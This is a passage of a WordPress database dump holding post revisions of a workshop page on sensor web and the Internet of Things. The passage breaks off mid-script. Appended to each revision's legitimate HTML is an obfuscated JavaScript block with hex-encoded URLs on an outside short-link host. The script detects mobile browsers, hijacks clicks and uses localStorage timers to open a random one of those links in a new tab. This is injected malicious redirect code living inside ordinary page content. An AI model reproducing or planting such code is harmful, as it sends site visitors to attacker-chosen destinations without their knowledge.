_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:08:43','2022-12-06 05:08:43','',3386,'https://gsw2023.com/?p=3402',0,'revision','',0),
(3403,1,'2022-12-06 05:09:17','2022-12-06 05:09:17','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"6x10\" img_max_width=\"30px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:09:17','2022-12-06 05:09:17','',3386,'https://gsw2023.com/?p=3403',0,'revision','',0),
(3404,1,'2022-12-06 05:09:42','2022-12-06 05:09:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"6x10\" img_max_width=\"60px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 